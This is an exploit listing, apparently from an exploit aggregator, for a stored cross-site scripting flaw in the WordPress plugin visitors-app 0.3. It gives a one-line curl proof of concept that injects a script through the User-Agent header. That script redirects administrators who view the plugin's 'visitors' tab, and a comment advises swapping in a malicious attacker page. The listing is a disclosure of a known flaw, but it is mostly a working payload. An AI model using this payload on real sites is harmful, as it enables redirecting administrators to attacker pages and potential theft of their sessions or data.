Exploit for WordPress Visitors-App 0.3 Cross Site Scripting

Name: Exploit for WordPress Visitors-App 0.3 Cross Site Scripting
Rating: 5 (108 reviews)

2021-06-09 | CVSS -0.1

## https://sploitus.com/exploit?id=PACKETSTORM:163045
# Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)  
# Date: 09/06/2021  
# Exploit Author: Mesut Cetin  
# Vendor Homepage: https://profiles.wordpress.org/domingoruiz/  
# Software Link: https://wordpress.org/plugins/visitors-app/  
# Version: 0.3   
# Tested on: Debian GNU/Linux 10  
# Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc  
  
## Description:  
# A vulnerability in the Wordpress plugin "visitors" version 0.3 and prior allows remote attacker through   
# Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations  
# The 'user-agent' parameter allows attacker to escalate their privileges.  
  
## PoC  
# Replace google.com with malicious attacker page  
curl -i http://localhost/wordpress --user-agent "</script><script>location=([]+/http:\\google.com/g).substr(1,19); </script>"  
  
# on http://localhost/wordpress/wp-admin, browse the tab "visitors"